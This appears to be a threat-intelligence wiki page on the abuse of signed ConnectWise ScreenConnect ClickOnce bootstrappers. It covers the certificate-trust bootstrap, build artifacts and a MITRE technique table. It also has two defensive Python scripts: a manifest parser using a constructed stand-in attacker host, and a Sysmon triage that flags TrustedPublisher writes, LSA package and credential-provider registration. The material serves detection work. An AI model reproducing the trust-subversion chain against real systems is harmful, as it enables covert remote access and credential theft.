ConnectWise (ScreenConnect) abuse
Abuse of the legitimate ConnectWise ScreenConnect remote-access platform through ClickOnce bootstrapper binaries that carry a valid ConnectWise, LLC Authenticode signature and point the client at an attacker-controlled server. The analyses cited on this page establish that the signature is genuine; they do not establish how the attacker obtained signed binaries (stolen key, compromised build, or simply a legitimate build configured against the attacker's own ScreenConnect server).
Overview
ConnectWise ScreenConnect is a legitimate enterprise remote-access and remote-support platform. Attackers have been observed distributing ClickOnce runner executables signed with ConnectWise's own code-signing certificate. In the later variant these binaries do not contain the ScreenConnect client at all: they perform a certificate-trust bootstrap (opening the TrustedPublisher store with CertOpenSystemStoreA and adding the publisher certificate with CertAddCertificateContextToStore) and then invoke dfshim.dll (ShOpenVerbApplicationW) to fetch and install a ScreenConnect client from an attacker-controlled IP address. Because the publisher is now trusted, ClickOnce installs without its trust prompt and SmartScreen raises no warning; the result is a fully signed, legitimate-looking remote-access session. The earlier variant shipped the complete client installer (MSI) inside the signed binary instead.
First observed sample: 7145e8 (Nov 2022 build, full MSI bundle, sourced via OpenCTI / abuse.ch). Second observed variant: 81adbf9a (Apr 2025 build, ClickOnce bootstrapper). Over roughly 2.5 years the tooling moved from a self-contained installer to a minimal network-staged bootstrapper.
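The ClickOnce deployment that the bootstrap hands to dfshim is described by an .application manifest whose deploymentProvider codebase is the download server, so the manifest is where a responder can see the staging source. The following Python script is an added example (not code from either analysis, nor from ConnectWise) that parses such a manifest and flags the indicators that separate a staged client from an organisation's own ScreenConnect instance. The manifest, the TEST-NET address 203.0.113.10, the publisher string and the expected-host list are all constructed for the example.

```python
"""Parse a ClickOnce .application manifest and flag staging indicators (added example)."""
import ipaddress
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

NS = {
    "asmv1": "urn:schemas-microsoft-com:asm.v1",
    "asmv2": "urn:schemas-microsoft-com:asm.v2",
}

# Constructed manifest for the example: ClickOnce schema shape, with a TEST-NET host
# standing in for an attacker-controlled server. Not taken from either analysed sample.
SAMPLE_MANIFEST = """<asmv1:assembly xmlns:asmv1="urn:schemas-microsoft-com:asm.v1"
                xmlns="urn:schemas-microsoft-com:asm.v2"
                xmlns:asmv2="urn:schemas-microsoft-com:asm.v2"
                manifestVersion="1.0">
  <assemblyIdentity name="ScreenConnect.ClientSetup.application" version="25.4.0.0"
                    publicKeyToken="0000000000000000" language="neutral"
                    processorArchitecture="msil" />
  <description asmv2:publisher="ConnectWise" asmv2:product="ScreenConnect Client" />
  <deployment install="false">
    <deploymentProvider codebase="http://203.0.113.10/Bin/ScreenConnect.ClientSetup.application?e=Access" />
  </deployment>
  <dependency>
    <dependentAssembly dependencyType="install" codebase="ScreenConnect.ClientSetup.exe.manifest" size="12345">
      <assemblyIdentity name="ScreenConnect.ClientSetup.exe" version="25.4.0.0" />
    </dependentAssembly>
  </dependency>
</asmv1:assembly>
"""


def _is_ip_literal(host: str) -> bool:
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def _find(root, tag):
    # Manifests mix the asm.v1 and asm.v2 namespaces; look in both.
    for prefix in ("asmv1", "asmv2"):
        el = root.find(f"{prefix}:{tag}", NS)
        if el is not None:
            return el
    return None


def assess(xml_text: str, expected_hosts=frozenset()) -> dict:
    """Extract identity, publisher and deployment source; list why it looks staged.

    expected_hosts: the organisation's own ScreenConnect host names (assumed allowlist).
    """
    root = ET.fromstring(xml_text)
    ident = _find(root, "assemblyIdentity")
    desc = _find(root, "description")
    deployment = root.find("asmv2:deployment", NS)
    provider = root.find("asmv2:deployment/asmv2:deploymentProvider", NS)

    publisher = desc.get(f"{{{NS['asmv2']}}}publisher", "") if desc is not None else ""
    codebase = provider.get("codebase", "") if provider is not None else ""
    url = urlsplit(codebase)
    host = (url.hostname or "").lower()

    indicators = []
    if codebase:
        if url.scheme.lower() != "https":
            indicators.append(f"cleartext deployment transport ({url.scheme})")
        if _is_ip_literal(host):
            indicators.append(f"deployment host is a bare IP literal ({host})")
        elif expected_hosts and host not in expected_hosts:
            indicators.append(f"deployment host is not an expected ScreenConnect instance ({host})")
    # A genuine ConnectWise publisher identity plus an untrusted source is the pattern on this page.
    if publisher.lower().startswith("connectwise") and indicators:
        indicators.append("ConnectWise publisher identity combined with untrusted deployment source")

    return {
        "name": ident.get("name", "") if ident is not None else "",
        "version": ident.get("version", "") if ident is not None else "",
        "publisher": publisher,
        "install": deployment.get("install") if deployment is not None else None,
        "codebase": codebase,
        "host": host,
        "indicators": indicators,
    }


if __name__ == "__main__":
    result = assess(SAMPLE_MANIFEST, frozenset({"support.example.com"}))
    print(result["name"], result["version"], "publisher:", result["publisher"])
    for line in result["indicators"]:
        print("INDICATOR:", line)
```

Pass your own ScreenConnect host names as expected_hosts; with an empty set the script only flags IP literals and cleartext transport, which is still enough to catch the network-staged variant described above.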
Build-stack typically observed
Two deployment variants observed:

Variant A — MSI bundle (7145e8, Nov 2022):
- Compiler: MSVC 14.33 (Visual Studio 2022 17.3) ^[raw/analyses/7145e8/report.md]
- Language: C/C++ native wrapper bootstrapping embedded .NET 2.0 assemblies (CIL)
- Linker flags: /DYNAMICBASE, /NXCOMPAT
- Signing: Valid Authenticode by ConnectWise, LLC (DigiCert chain) ^[raw/analyses/7145e8/report.md]
- PDB leak: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb
- Deployment: Self-contained PE32 with embedded ScreenConnect assemblies in .rsrc, loaded via mscoree!CorBindToRuntimeEx; the MSI payload installs services, a credential provider, and an LSA authentication package.

Variant B — ClickOnce bootstrapper (81adbf9a, Apr 2025):
- Compiler: MSVC 14.40 (Visual Studio 2022 17.10) ^[raw/analyses/81adbf9a/report.md]
- Language: C/C++ (no .NET runtime)
- Linker flags: /DYNAMICBASE, /NXCOMPAT, CastGuard enabled
- Signing: Valid Authenticode by ConnectWise, LLC (DigiCert chain) ^[raw/analyses/81adbf9a/report.md]
- PDB leak: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb
- Protection: No packing, no obfuscation, no anti-debug. The evasion is entirely in the valid signature and the legitimate tool chain.
Deploy / TTPs typically observed

| Technique | MITRE ID | Evidence |
|---|---|---|
| Subvert Trust Controls: Install Root Certificate (publisher certificate into TrustedPublisher) | T1553.004 | CertOpenSystemStoreA("TrustedPublisher"), CertAddCertificateContextToStore ^[raw/analyses/81adbf9a/report.md] |
| Remote Access Software | T1219 | Hard-coded ScreenConnect C2 endpoint, embedded client assemblies ^[raw/analyses/7145e8/report.md] |
| Ingress Tool Transfer | T1105 | Embedded MSI with Cabinet archives installing ScreenConnect from .rsrc ^[raw/analyses/7145e8/report.md] |
| Create or Modify System Process: Windows Service | T1543.003 | MSI ServiceInstall table + SafeBoot\Network persistence ^[raw/analyses/7145e8/report.md] |
| OS Credential Dumping: LSASS Memory | T1003.001 | LSA authentication package registration (ScreenConnect.WindowsAuthenticationPackage.dll); the package is loaded into LSASS and receives logon credentials ^[raw/analyses/7145e8/report.md] |
| Input Capture: Credential API Hooking | T1056.001 | Windows Credential Provider DLL (ScreenConnect.WindowsCredentialProvider.dll) ^[raw/analyses/7145e8/report.md] |
| Boot or Logon Autostart Execution: Authentication Package | T1547.002 | Authentication package and credential provider registered at install time ^[raw/analyses/7145e8/report.md] |
| Subvert Trust Controls: Code Signing | T1553.002 | Valid Authenticode signature by ConnectWise, LLC ^[raw/analyses/7145e8/report.md] |
| Application Layer Protocol: Web Protocols | T1071.001 | HTTP (delegated to dfshim in Variant B; direct via the ScreenConnect client in Variant A) ^[raw/analyses/81adbf9a/report.md] |
| User Execution: Malicious File | T1204.002 | Malicious .application execution flow (Variant B) ^[raw/analyses/81adbf9a/report.md] |
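As an added example (not from either analysis, which carry their own YARA and Sigma rules), the following Python triage maps Sysmon-style registry-set (Event ID 13) and process-create (Event ID 1) events onto the rows of the table above, so a responder can see which host artifacts each row produces. The events are constructed. The registry locations follow standard Windows conventions (LSA "Authentication Packages" multi-string, the Credential Providers CLSID key, SafeBoot\Network, a service ImagePath, and the per-user TrustedPublisher store that CertOpenSystemStoreA opens); the dfsvc.exe command-line shape and the allowlist of processes expected to write TrustedPublisher entries are assumptions.

```python
"""Triage constructed Sysmon-style events for the ScreenConnect artifacts on this page.

Detection logic only (added example); the event shapes and allowlists are assumptions.
"""
import re
from dataclasses import dataclass

# Registry locations, per Windows conventions as Sysmon renders them (HKLM\... / HKU\<SID>\...).
LSA_AUTHPKG = re.compile(r"\\Control\\Lsa\\Authentication Packages$", re.I)
CRED_PROVIDER = re.compile(r"\\Authentication\\Credential Providers\\\{[0-9a-f-]{36}\}", re.I)
SAFEBOOT_NET = re.compile(r"\\Control\\SafeBoot\\Network\\", re.I)
SERVICE_IMAGE = re.compile(r"\\Services\\[^\\]*ScreenConnect[^\\]*\\ImagePath$", re.I)
TRUSTED_PUB = re.compile(r"\\SystemCertificates\\TrustedPublisher\\Certificates\\[0-9A-F]{40}\\Blob$", re.I)
# ClickOnce activation of an .application manifest served from a bare IP (assumed command-line shape).
CLICKONCE_IP_URL = re.compile(r"https?://(\d{1,3}(?:\.\d{1,3}){3})\S*\.application", re.I)

# Processes that legitimately populate TrustedPublisher on a managed host (assumed allowlist).
CERT_WRITERS_OK = {"msiexec.exe", "certutil.exe", "mmc.exe", "svchost.exe"}


@dataclass
class Hit:
    technique: str
    summary: str
    image: str


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def triage(events):
    """Return one Hit per event that matches a row of the TTP table."""
    hits = []
    for ev in events:
        eid, image = ev.get("EventID"), ev.get("Image", "")
        if eid == 13:  # RegistryEvent (Value Set)
            target, details = ev.get("TargetObject", ""), ev.get("Details", "")
            mentions_sc = "screenconnect" in (target + details).lower()
            if LSA_AUTHPKG.search(target) and mentions_sc:
                hits.append(Hit("T1547.002", "ScreenConnect LSA authentication package registered", image))
            elif CRED_PROVIDER.search(target) and mentions_sc:
                hits.append(Hit("T1056.001", "ScreenConnect credential provider registered", image))
            elif SAFEBOOT_NET.search(target) and mentions_sc:
                hits.append(Hit("T1543.003", "ScreenConnect service allowed in Safe Mode with Networking", image))
            elif SERVICE_IMAGE.search(target):
                hits.append(Hit("T1543.003", f"ScreenConnect service ImagePath set: {details}", image))
            elif TRUSTED_PUB.search(target) and _basename(image) not in CERT_WRITERS_OK:
                hits.append(Hit("T1553.004", "TrustedPublisher certificate added by non-installer process", image))
        elif eid == 1:  # ProcessCreate
            m = CLICKONCE_IP_URL.search(ev.get("CommandLine", ""))
            if _basename(image) == "dfsvc.exe" or m:
                where = m.group(1) if m else "unknown host"
                hits.append(Hit("T1204.002", f"ClickOnce .application activation from {where}", image))
    return hits


# Constructed events: one per artifact, plus benign TrustedPublisher noise from svchost.
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": r"C:\Users\victim\Downloads\ClickOnceRunner.exe",
     "TargetObject": r"HKU\S-1-5-21-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\0123456789ABCDEF0123456789ABCDEF01234567\Blob",
     "Details": "Binary Data"},
    {"EventID": 1, "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe",
     "CommandLine": r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe" http://203.0.113.10/Bin/ScreenConnect.ClientSetup.application'},
    {"EventID": 13, "Image": r"C:\Windows\System32\msiexec.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Control\Lsa\Authentication Packages",
     "Details": "msv1_0\x00ScreenConnect.WindowsAuthenticationPackage"},
    {"EventID": 13, "Image": r"C:\Windows\System32\msiexec.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{11111111-2222-3333-4444-555555555555}\(Default)",
     "Details": "ScreenConnect.WindowsCredentialProvider"},
    {"EventID": 13, "Image": r"C:\Windows\System32\services.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\ScreenConnect Client (abc123)\ImagePath",
     "Details": r"C:\Program Files (x86)\ScreenConnect Client (abc123)\ScreenConnect.ClientService.exe"},
    {"EventID": 13, "Image": r"C:\Windows\System32\msiexec.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Control\SafeBoot\Network\ScreenConnect Client (abc123)\(Default)",
     "Details": "Service"},
    {"EventID": 13, "Image": r"C:\Windows\System32\svchost.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\89ABCDEF0123456789ABCDEF0123456789ABCDEF\Blob",
     "Details": "Binary Data"},
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(f"{hit.technique}  {hit.summary}  [{hit.image}]")
```

The TrustedPublisher rule is the one worth tuning: on a managed fleet the per-user store is rarely written by anything other than installers, so a write from a freshly downloaded signed executable is the distinguishing signal for Variant B, while the LSA, credential-provider and SafeBoot rows are generic to any ScreenConnect install and need the host-level context of whether that install was expected.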
Capabilities
- authenticode-trust-bootstrap-trustedpublisher
- clickonce-deployment-dfshim-shopenverbapplicationw
- remote-access-software-staging
- certificate-store-manipulation-crypt32
- http-c2-clickonce-manifest
- no-direct-socket-api-delegated-http
- valid-legitimate-certificate-masquerade
- msi-bundle-self-extracting-installer
- dotnet-runtime-corbindtoruntimeex
- embedded-assembly-rcdata-resource-loading
- service-install-safeboot-persistence
- lsa-authentication-package-injection
- windows-credential-provider-registration
- hardcoded-c2-appconfig
Variants / Aliases
- connectwise (OpenCTI label)
- ScreenConnect (product name used in C2 URL)
- ClickOnceRunner (PDB / internal build name)
Notable analyses
- raw/analyses/7145e8299053/report.md — Self-contained MSI bundle, full ScreenConnect client installer with embedded .NET assemblies, hardcoded C2, LSA authentication package, and credential provider registration. MSVC 14.33, Nov 2022 build.
- raw/analyses/81adbf9a/report.md — Authenticode-backed ClickOnce runner, static-only deep-dive with YARA + Sigma rules. MSVC 14.40, Apr 2025 build.
Related entities / concepts
- clickonce-certificate-trust-bootstrap — Specific technique page for the certificate → ClickOnce deployment chain
- legitimate-remote-access-tool-abuse — Cross-family concept page covering abuse of legitimate remote-access tools
- netsupport-inno-dropper — Another legitimate remote-access tool (NetSupport Manager) abused via installer repackaging